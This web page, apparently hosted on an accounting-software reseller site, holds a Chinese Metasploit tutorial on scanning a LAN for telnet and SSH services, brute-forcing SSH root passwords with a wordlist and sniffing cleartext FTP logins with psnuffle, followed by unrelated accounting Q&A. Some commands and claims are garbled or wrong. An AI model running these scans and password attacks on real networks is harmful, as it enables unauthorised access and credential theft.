用友软件首页

Metasploit学习之常见的服务扫描与口令猜解

2019-4-10 8:0:0 wondial

Metasploit学习之常见的服务扫描与口令猜解

Metasploit学习之常见的服务扫描与口令猜解

有的时候我们利用了Nmap发现了端口和服务器上的服务器,然而我们并不是专业的hack,很多时候或许我们只能破FTP 共享和telnet,虽然够低端,但是如果你已经在一个局域网中了,上面3个服务器必然会存在。

利用telnet来扫描

>search telnet_version 查找telnet扫描模块

>use auxiliary/scanner/telnet/telnet_version 使用该模块

>set RHOSTS 192.168.1.0/24 进行整个网段扫描

>set THREADS 100 设置线程,这个数值可以自己定义

>run

利用ssh来扫描

 

>search ssh_version 查找ssh扫描模块

>use auxiliary/scanner/telnet/ssh_version 这个版本可能是其他的

>set RHOSTS 192.168.1.0/24 进行整个网段扫描

>set THREADS 100 设置线程,这个数值可以自己定义

>run

利用services来进行扫描的方法都是大同小异,如果想利用其他的services进行扫描,可以先

>search name_version 扫描出具体支持哪些服务,当然这是个积累的过程,常用的扫描还有oracle Mssql mysql等等,当然其实很多时候我们都是在抓瞎,Nmap足以解决问题了,更多的时候我们使用这个工具就是为了后面的猜解和监听做准备,下面就讲解一些猜解方法。

SSH服务口令猜解

SSH服务器相当于windows下的FTP,我想多数管理员是不会配置密码的,因为SSH可以通过公钥配对加密和验证的,而且很难猜解,当然也许有的管理员就设置了账户密码,这样的时候我们就可以利用下面的命令进行猜解了,当然你得有一张足够大的彩虹表

>search ssh 如果熟练了可以直接敲路径了,反正我是记不住,而且模块众多,短时间很难掌握全。

>use auxiliary/scanner/ssh/ssh_login 选择ssh口令猜解模块

>set RHOSTS 192.168.1.105 设置hosts

>set USERNAME root 设置用户名为root

>set set PASS_FILE/root/password.txt 这个字典自己做啦,工具很多,好坏就在于字典了

>set THREADS 50 设置线程数,这个设置多了可能会死机,会拒绝服务,设置少了猜解会慢

>run

因为我不会拿自己的职业生涯开玩笑,所以我只在我自己搭建的环境下试验过,所以效果如何不敢评价,总是不太好吧。

FTP嗅探工具psnuffle

这个工具是嗅探明文传送的FTP的,所以所见即所得,内网破解很实用,尤其是在win系统下,如果是利用IIS搭建的FTP服务,那么你嗅探到的账户肯定具有user权限,而后怎么提权就自己想去吧,如果利用FTP软件,这个账户即使得到个人感觉用处也不大,除非可以获得写权限,这样可以上传shell.好吧,不多讲了,看下psnuffle这个绕口的工具的使用方法:

>use auxiliary/sniffer/psnuffle

>run

当然你如果确定了端口也可以进行一些限制,使用set命令就好,这个嗅探可能需要开那么几个小时,因为谁也不知道啥时候会有人登陆FTP,有的时候我在局域网了,我宁愿做DNS欺骗,感觉这样更加简单暴力,当然,也许直接就被防火墙抓了,呵呵

如果您的问题还没有解决,可以到 T+搜索>>上找一下答案

分享到:

微博关注

bj用友软件

最新信息

Uplay 注册失败,需要专业人士帮助

Uplay 注册失败,需要专业人士帮助 Uplay 注册失败,需要专业人士帮助


挂个VPN注册

客户端重新安装时提示“软件没有正确卸载”,无法重新安装

客户端重新安装时提示“软件没有正确卸载”,无法重新安装 客户端重新安装时提示“软件没有正确卸载”,无法重新安装

U8知识库
问题号:12979
解决状态:最终解决方案
软件版本:8.52
软件模块:系统管理
行业:通用
关键字:卸载
适用产品:全部
问题名称:客户端重新安装时提示“软件没有正确卸载”,无法重新安装
问题现象:WIN98环境,用户客户端重新安装时,提示“软件没有正确卸载”,无法重新安装。
问题原因:注册表没有删除干净
解决方案:注册表中删除SETUP.ini中的ProductGUID的键值
补丁编号:
录入日期:2016-03-16 15:23:45
最后更新时间:

热点文章

新闻资讯

  • 【新年首签】天津用友&通广集团签署战略协议

    【新年首签】天津用友&通广集团签署战略协议

    天津用友软件技术有限公司(以下简称天津用友)和天津通信广播集团有限公司(以下简称通广集团)就企业信息化建设事宜进行战略签约。

    参加此次会议有天津用友总经理赵永春,天津用友副总经理王成岩、通广集团副总经理马严、通广集团科技质量部部长尹刚、七一二公司技术质量部部长门国梁、七一二公司技术中心主任黄建尧等。

    image

  • 会计职场堪比宫斗剧

    会计职场堪比宫斗剧

     近几年,各种宫斗剧火爆,《甄嬛传》《芈月传》等等都脍炙人口,许多人经常打趣自己像某个人物,若是在古代能活到第几集。让人不禁想起,会计职场又何尝不是一场宫斗,每天要察言观色,明了领导的内心,就像后宫谁也不敢惹皇后一样。但当你坐上领导位置的时候,盯着你的眼睛就会很多,稍有不慎就会被取代。就像后宫的嫔妃一样,就算坐上了皇后的位置也要时刻担心有没有人觊觎。

    image

知 识 库

  • 用友软件凭证填制环节常见问题及解决方案

    用友软件凭证填制环节常见问题及解决方案

    用友软件凭证填制环节常见问题及解决方案用友软件凭证填制环节常见问题及解决方案

      用友软件的账务处理采用放射式数据处理流程,对业务数据采用集中收集、统一处理、数据共享的操作方法,凭证数据库既是数据归集的“信息仓库”,又是后续业务处理的“信息源泉”。因此,凭证填制数据的正确与否直接关系到后续账表及相关业务信息的准确性。
      在用友软件中,其基础设置及凭证管理模块为我们提供了凭证类别控制、受控科目控制、制单序时控制、支票控制、制单权限控制等功能,加强了对发生业务的及时管理和控制,通过严密的制单控制保证填制凭证的正确性。然而在实际应用中,却常因用户不理解各项控制参数的含义,以及对后续操作的影响;没有准确无误地设置相关控制参数及基础信息;没有正确完整地录入凭证辅助信息等原因,使先进的控制工具无法充分发挥效用,损失了部分数据信息,降低了软件的使用效能。对此,笔者将以用友ERP-U8.72软件为例,总结凭证填制环节的常见问题,结合典型案例,追根寻源,深入剖析其产生的原因,以便对症解决。一、凭证类别设置时常见问题
      出错信息描述:“不满足借方必有条件”,“不满足贷方必有条件”,“不满足借贷必无条件”,“不满足凭证必有条件”。
      典型案例剖析:2009年8月16日,总经理办公室支付业务招待费1 200元,转账支票号ZZR003。凭证内容如下:
      借:管理费用/招待费(660205)1 200
      贷:银行存款/工行存款(100201)1 200
      当凭证保存时,弹出出错信息框,提示“不满足借贷必无条件”。此信息说明用户之前为不同类别的凭证设置了限制条件,指定了相应的限制类型和限制科目。这样,当凭证填制时,系统就会根据所设置的凭证类别判断凭证内容是否符合限制条件,不相符时就会出现类似的出错信息。对于此类问题,用户首先应根据提示信息,认真查对所选凭证类别与所录入的业务内容是否相符,然后进一步判断究竟是凭证类别设置错误,还是会计科目选择错误?
      此案例中的凭证类别选择的是“转账凭证”,转账凭证的限制类型应为“凭证必无”,限制科目为“1001,100201,100202”,即在凭证借贷方不能出现这三个科目。而该凭证的贷方却出现了100201科目,显然违背了所设置的限制条件。进一步判断可知,此问题是因凭证类别设置错误所致的。根据业务内容该凭证类别应为“付款凭证”,而非“转账凭证”。当更正凭证类别后,问题即得到解决。经进一步分析得知,用户在填制凭证时,因为看到在业务中用到了转账支票,就认为这应该是一张转账凭证,从而导致凭证类别判断错误。而追根寻源是由于用户对业务的凭证类别判断不准,不明白凭证类别的限制条件,甚至于不清楚什么是收、付、转凭证。当问题出现时,就会因不理解凭证类别限制条件的含义而找不到问题解决的方向和方法。
      此外,对于此类问题,如果用户在认真查对后,发现凭证类别与凭证内容匹配,但仍出现出错信息,则应考虑可能是因用户粗心将凭证类别的限制条件设置有误。常见的错误有将收款凭证和付款凭证的限制类型设反了,或将转账凭证的限制类型设为“凭证必有”,或未写全限制科目。

  • 用友t3账套每月备份

    用友t3账套每月备份

    用友t3账套每月备份

    用友软件提供两种备份方式:手工备份和自动备份,下面我们讲解这两种方式的备份账套数据操作步骤(T6和U8与T3备份恢复方法相同,此处以T3为例):

    ㈠、手工备份

    1、先在硬盘上建立一个空文件夹

    打开我的电脑(双击)D(或E、F)盘,(空白处右击右键)新建文件夹,把这个新建的文件夹,改名为如用友数据手工备份。(双击)打开用友数据手工备份,(右击)出现新建文件夹,把所新建的文件夹改名为当天的备份日期如2016-12-16后退出

  • 最新文章排行
  • 热门文章排行

管理软件

  • T3卸载就会跳到安装界面去,用360工具也卸载不了。请问这种情况哪位老师遇见过,我们应该如何处理。谢谢、在线等。

    T3卸载就会跳到安装界面去,用360工具也卸载不了。请问这种情况哪位老师遇见过,我们应该如何处理。谢谢、在线等。

    T3卸载就会跳到安装界面去,用360工具也卸载不了。请问这种情况哪位老师遇见过,我们应该如何处理。谢谢、在线等。 T3卸载就会跳到安装界面去,用360工具也卸载不了。请问这种情况哪位老师遇见过,我们应该如何处理。谢谢、在线等。[]

    备份好账套,这种情况只能强制删除了,请备份好账套之后,停止数据库服务和T3产品服务,自动备份服务;然后删除T3安装路径以及C盘下ufcomsql文件夹,然后使用360清除无用注册表,最后重启电脑即可;

  • #财务软件#下载了一个金蝶软件,入科目时一直显示占用怎么办?

    #财务软件#下载了一个金蝶软件,入科目时一直显示占用怎么办?

    #财务软件#下载了一个金蝶软件,入科目时一直显示占用怎么办? #财务软件#下载了一个金蝶软件,入科目时一直显示占用怎么办?[]

    用这里免费的易代账可完美解决
    这个问题不太清楚,用友软件在使用过程中没有遇见过这个问题。应该是你添加科目的上级科目已经在使用了。
    左下角 点 开始 程序 金蝶 ,然后在里面找到 工具 选择网络清除工具 即可!

关于我们 | 公司动态 | 获奖记录 | 联系我们 | 招聘信息 | 用友产品中心 | 用友云基地
Copyright ©  www.kuaiji66.com  All Rights Reserved 天龙瑞德
京ICP备11046295号-1 技术支持 北京天龙瑞德信息技术有限责任公司   北京海淀上地十街辉煌国际大厦3号楼6层 总机:010-59798025   售后:4009908488
北京天龙瑞德信息技术有限责任公司